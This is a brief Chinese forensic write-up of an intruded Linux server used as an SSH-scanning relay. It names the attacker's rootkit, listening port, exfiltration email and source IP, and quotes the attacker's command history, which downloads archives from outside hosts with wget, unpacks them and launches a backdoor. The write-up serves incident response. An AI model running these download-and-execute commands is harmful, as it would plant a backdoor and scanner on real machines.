作者:追求生活的垃圾筒 | 来源:互联网 | 2017-11-10 13:32
文章标题:分析一台被入侵的linux服务器。Linux是中国IT实验室的一个技术频道。包含桌面应用,Linux系统管理,内核研究,嵌入式系统和开源等一些基本分类
客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下
黑客进入服务器后所做的操作:
1. 向/var/tmp/下上传了两个恶意程序
其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。
2. 入侵者登陆记录
85.120.78.140的IP来自罗马尼亚。
3. wget http://pinky.clan.su/scan/wtf.jpg ; tar zxvf wtf.jpg
wget adelinuangell.lx.ro/ryo.tar
tar xvf ryo.tar
cd .access.log
./config Ady 14785
./run
结束进程。删掉程序。。删掉用户。修改root密码。